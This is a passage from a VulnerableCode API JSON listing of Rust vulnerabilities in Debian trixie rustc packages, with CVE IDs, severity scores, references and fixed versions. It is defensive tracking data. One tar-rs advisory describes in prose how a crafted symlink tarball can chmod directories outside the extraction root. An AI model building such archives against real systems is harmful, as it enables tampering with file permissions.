"pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-28879" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pbjz-th4w-tqgb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56587?format=api", "vulnerability_id": "VCID-pg4p-jbym-qqb6", "summary": "Multiple vulnerabilities have been found in Rust, the worst which\n may allow local attackers to execute arbitrary code.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000810.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000810.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2018-1000810", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00593", "scoring_system": "epss", "scoring_elements": "0.69351", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00593", "scoring_system": "epss", "scoring_elements": "0.69337", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00593", "scoring_system": "epss", "scoring_elements": "0.69345", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70114", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70162", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70178", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70201", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70186", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70174", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70216", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70225", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70204", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.7011", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70122", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00625", "scoring_system": "epss", "scoring_elements": "0.70137", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2018-1000810" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000810", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000810" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1632932", "reference_id": "1632932", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1632932" }, { "reference_url": "https://security.gentoo.org/glsa/201812-11", "reference_id": "GLSA-201812-11", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/201812-11" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938933?format=api", "purl": "pkg:deb/debian/rustc@1.30.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.30.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2018-1000810" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pg4p-jbym-qqb6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31471?format=api", "vulnerability_id": "VCID-pvm9-wtbx-1ubx", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28878", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77065", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77216", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77195", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77202", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77071", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.771", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77082", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77115", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77124", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77152", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77131", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77126", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77167", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77169", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.01012", "scoring_system": "epss", "scoring_elements": "0.77161", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28878" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949207", "reference_id": "1949207", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949207" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-28878" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pvm9-wtbx-1ubx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24628?format=api", "vulnerability_id": "VCID-qj1y-b8m1-hyfm", "summary": "tar-rs `unpack_in` can chmod arbitrary directories by following symlinks\n## Summary\n\nWhen unpacking a tar archive, the `tar` crate's `unpack_dir` function uses `fs::metadata()` to check whether a path that already exists is a directory. Because `fs::metadata()` follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory — and subsequently apply `chmod` to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root.\n\n## Reproducer\n\nA malicious tarball contains two entries: (1) a symlink `foo` pointing to an arbitrary external directory, and (2) a directory entry `foo/.` (or just `foo`). When unpacked, `create_dir(\"foo\")` fails with `EEXIST` because the symlink is already on disk. The `fs::metadata()` check then follows the symlink, sees a directory at the target, and allows processing to continue. The directory entry's mode bits are then applied via `chmod`, which also follows the symlink — modifying the permissions of the external target directory.\n\n## Fix \n\nThe fix is very simple, we now use `fs::symlink_metadata()` in `unpack_dir`, so symlinks are detected and rejected rather than followed.\n\n## Credit\n\nThis issue was reported by @xokdvium - thank you!", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33056", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01448", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01422", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01431", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.0144", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01446", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01441", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01436", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01432", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01946", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01916", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01922", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01912", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33056" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056" }, { "reference_url": "https://github.com/alexcrichton/tar-rs", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/alexcrichton/tar-rs" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056" }, { "reference_url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481", "reference_id": "1131481", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449490", "reference_id": "2449490", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449490" }, { "reference_url": "https://github.com/advisories/GHSA-j4xf-2g29-59ph", "reference_id": "GHSA-j4xf-2g29-59ph", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j4xf-2g29-59ph" }, { "reference_url": "https://usn.ubuntu.com/8138-1/", "reference_id": "USN-8138-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8138-1/" }, { "reference_url": "https://usn.ubuntu.com/8138-2/", "reference_id": "USN-8138-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8138-2/" }, { "reference_url": "https://usn.ubuntu.com/8139-1/", "reference_id": "USN-8139-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8139-1/" }, { "reference_url": "https://usn.ubuntu.com/8168-1/", "reference_id": "USN-8168-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8168-1/" }, { "reference_url": "https://usn.ubuntu.com/8168-2/", "reference_id": "USN-8168-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8168-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2026-33056", "GHSA-j4xf-2g29-59ph" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qj1y-b8m1-hyfm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83190?format=api", "vulnerability_id": "VCID-ra1h-asnb-53eh", "summary": "rust: Buffer Overflow vulnerability in std::collections::vec_deque::VecDeque::reserve() function", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000657.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1000657.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2018-1000657", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35757", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35951", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35981", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35812", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35862", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35885", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35891", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35849", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35826", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35865", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35853", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35803", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.3557", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35539", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35451", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2018-1000657" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000657", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000657" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1622249", "reference_id": "1622249", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1622249" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=906585", "reference_id": "906585", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=906585" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938932?format=api", "purl": "pkg:deb/debian/rustc@1.22.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.22.1%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } 